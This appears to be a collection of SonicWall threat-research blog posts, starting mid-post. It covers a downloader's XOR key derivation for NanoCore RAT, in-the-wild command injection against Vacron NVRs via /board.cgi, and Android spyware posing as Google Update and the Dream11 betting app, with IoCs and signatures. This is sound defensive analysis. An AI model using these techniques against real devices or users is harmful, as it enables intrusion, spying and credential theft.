Downloaded data contains 0x40 garbage bytes in the beginning. Instead of keeping hardcoded decryption key, malware computes the key after downloading the encrypted data. The malware contains a constant byte array of 0x30b size. The malware executes in a loop, picks the first word from the constant byte array XOR it with loop index and again XOR it with the word after 0x40 garbage bytes in the downloaded data and if the value comes to “4D5A”, the malware breaks the loop. Now the loop index is XOR with the constant byte array to get 0x30B bytes decryption key:

 

The malware decrypts the payload data using the decryption key, which is the NanoCore RAT for this variant. However the other variants also downloads AgentTesla, NetWire RAT and Ramcos RAT etc.:

 

The file is detected by only a few security vendors on popular threat intelligence sharing portal VirusTotal at the time of writing this blog, this indicates its spreading potential:

 

Evidence of the detection by RTDMI(tm) engine can be seen below in the Capture ATP report for this file:

Vacron Network Video Recorder Remote Command Execution

SonicWall Capture Labs threat research team observed attacks exploiting old vulnerability in Vacron NVR.

Network video recorders (NVRs) are IP-based appliances that are built for managing cameras, recording and viewing camera feeds at a site. NVRs are usually PC-grade or low-end server systems made using commercial off-the-shelf (COTS) hardware components. They typically contain an embedded operating system or a client operating system that hosts video management software, which provides users a mechanism to view, record and manage camera feeds. Vacron sells NVRs as well as other products.

Vacron NVR Remote Command Execution Vulnerability

The goal of command injection  attack  is the execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application.

The remote Vacron network video recorder is affected by a remote command execution vulnerability due to improper sanitization of user-supplied input passed via /board.cgi.

Following are some of the exploits found in the wild:

As one can see the vulnerable /board.cgi cannot properly sanitize the input. This allows the attacker to inject and execute the commands to change the directory and download malicious script from the attacker-controlled server.

SonicWall Capture Labs provides protection against this threat via following signatures:

      • IPS 13033:Vacron NVR Remote Command Execution
      • GAV: Linux.Mirai.N_2

IoCs

    • 222.138.188.211
    • 103.181.56.61
    • 125.44.20.51
    • 175.107.0.212
    • 3a43d007ed5ff84d4b71f96a49c88fe0061a2a9651935a82d4acbf55982fc370

Threat Graph

Android Malware impersonates Google Update Application with old traits

SonicWall Capture Labs Threats Research team has been regularly sharing information about malwares including spyware targeting Android devices. SonicWall has tracked down a huge number of fake applications disguised as legitimate Google update applications.

Fig 1. Fake Google Update applications

 

The new version of the spyware is recently available on malware-sharing platforms like VirusTotal.

Fig 2. VirusTotal submission history

 

Infection Cycle:

Most of the fake malicious google updater apps have some common activities of spyware and a few of them work as banking trojan as well.

After installation, the apps ask for Accessibility permission and then hide from the app drawer.

 

Fig 3: App Installation & Accessibility permission

 

It accesses the following activities on the device and tracked information is saved in the corresponding .json file and establishes a socket connection with C&C server “help.domainoutlet.site” and shares the device information in JSON file.

  • SMS
  • Call logs
  • Call Recording
  • Device Info
  • Location
  • Keyloggers
  • Device Contact
  • Notification

Fig 4: Storing contact details in JSON file

 

In some cases, along with spyware activities it also acts as a Banking Trojan, like SHA-256 fb3837dc602c3f51939891b75a34d706bbefa73f822cffffeb1b863a6526bf95 .

Dex file is dynamically loaded which contains the malicious banking trojan code.

Fig 5: Load Dex file

 

It checks for installed applications and compares them against specific package names preferably banking and Cryptocurrency apps (350+ apps). Once it determines that one of these apps is being used, it can carry out an overlay attack. In order to carry out an overlay attack, it places fake page over legitimate apps which looks similar to steal credentials.

Fig 6: Checking installed apps

 

Fig 7 : Load WebView for overlay attack

 

Fig 8: List of targeted apps

 

SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.

 

Indicators of Compromise (IOC):

01d0e1996d0ba3ff4e0bac4747b0e0d955fe93ac3cca62caebc46dfd4f4b811f

1ac57a4bc06ebdd42ffed1d63e7731eade4a58c302641f3373f2a42298e461e2

299c10f9f438b8176b8f49654952d9189ddcf3b9e44e834c54db7410ac2af9f1

417ebc3a1dcc71f76d67b97adffd239399110b18eb644ef0da74061c7d569ef7

421f4aeedfec86eb756ac9acbb55014d973f2aa7136718cfd93829944998878a

65c9fd0fb77c08319ff8047f7c9302da843f8dcea9a8bad482850c9e3bd545cf

6a31addaad870460f0713fe057cb7a47fffe426f2217dcb2e0167b4257f356c0

763dc2a295d95ed24e2f9081ff192d079f9d6837f8e6ad15f6453542dd0c2ab9

85a710df11765d424f367abcbb61b70bbc42ef1969e7fd59968c784a8b5937da

8a15e9deb145e90cff2bf414842221afc04494c90d0a8af7e059e2273f661934

9d6ee58c17c62ef5ff8d586a6bea437dbaa856a0ac96c8e425063a55e23d6b11

c56862b2de6d04d15bc11f1dffed108099a3f0c92098383774580eadd551fc82

c745c5c4032e6b6036e25d1efad8f30470aee99f368a923509f570310e5d2644

cc8db772726e5d3d4ec680cd53587d79592c7a5a83148ff5b5ec0b7b7ce1781c

fb3837dc602c3f51939891b75a34d706bbefa73f822cffffeb1b863a6526bf95

 

Info Stealers are leveraging betting apps ban over Google Play store

SonicWall Capture Labs Threats Research team has been regularly sharing information about malware threats targeting Android devices. Recently we have observed some fake fantasy league betting applications in the wild.

Google Play store banned all the gambling and sports betting applications but since March 2021 an update in their policies for online gaming ban was lifted in 19 countries while they use external third-party platforms in the rest of the other places.

In India, more than 25 fantasy apps are available, with an app named “Dream11” being the most popular and whose download count reached more than 130 million as per their official website.

As these apps are not present in the Google Play store malware authors are leveraging this fact to host fake malicious apps which look like genuine apps.

Infection cycle:

Once installed on the device, Dream11 application uses the following icons:

 

Fig 1: Malicious App icon

 

Fig 2: Showing the correct match schedule

Once executed it displays a page showing the match schedule as in Figure 2 above, however the app does not respond after this page. During our static investigation, we observed that it performs several malicious activities:

  • Receives commands via SMS
  • Reads and sends SMS
  • Reads and deletes contacts
  • Accesses call log (incoming, outgoing & missed calls)
  • Tracks location
  • Records audio
  • Logs keystrokes
  • Camera Access

 

Fig 3: Reads SMS and Executes command accordingly

Fig 4: Commands Received

Fig 5: Sent SMS

Fig 6: Call log Access

 

Fig 7: Deletes contact details

 

Fig 8: Audio record

Fig 9: Access device Location

Fig 10: Config file

Fig 11: Sending user info using socket connection

We urge our users to always be vigilant and cautious when installing software programs particularly if you are not certain of the source.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: AndroidOS.Fakeapp.FL 

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

Indicators of Compromise (IOC):

2ecd9211817021f8a3f3e1f4ad0bf1b7a98b0d82

0a55255e35390f3fed3cd333e0873f0054ff7827